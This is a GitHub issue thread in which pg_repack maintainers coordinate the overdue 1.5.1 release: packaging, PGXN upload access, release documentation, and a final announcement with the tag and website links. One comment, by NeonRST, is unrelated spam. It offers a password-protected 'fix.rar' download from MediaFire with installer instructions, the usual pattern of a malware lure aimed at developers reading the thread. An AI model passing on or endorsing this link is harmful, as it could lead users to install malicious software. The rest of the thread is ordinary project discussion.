### ISSUE TITLE
Releasing 1.5.1

### ISSUE THREAD

**Issue by MasahikoSawada** [reorg/pg_repack#417]
Hi,

#405 prepared changes for release 1.5.1 two month ago, but we don't make any officinally release a new version yet. As far as I can see, the remaining steps would be packaging, registering to pgxn, and documentation updates, and git tag works.

Does anyone want to proceed with the remaining steps? If not, I'm happy to help that. I have my PGXN account and have an experience of releasing a new version (it was very long ago, though).

**Comment by NeonRST** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by Melkij** [comment]
Yes, please take care of the rest of the steps if you don't mind.

**Comment by MasahikoSawada** [comment]
I've done packaging and checking it. When trying to upload the new  updated package, I could not find pg_repack repository on "Your Distrobutions" page of my account PGXN page. I'm not sure it is okay to proceed with uploading the new package. @dvarrazzo could you please check it?

**Comment by andreasscherbaum** [comment]
I'm not sure who owns the PGXN page.

Can you create a Wiki page with release steps, please? Would be nice to have the steps documented.

**Comment by MasahikoSawada** [comment]
The steps are already documented in doc/release.rst. It seems to still work.

**Comment by artemgavrilov** [comment]
Hello, is there any news regarding this release?

**Comment by za-arthur** [comment]
`1.5.1` was released :fire: .
Here is the tag: https://github.com/reorg/pg_repack/tree/ver_1.5.1
The website was updated too: https://reorg.github.io/pg_repack/
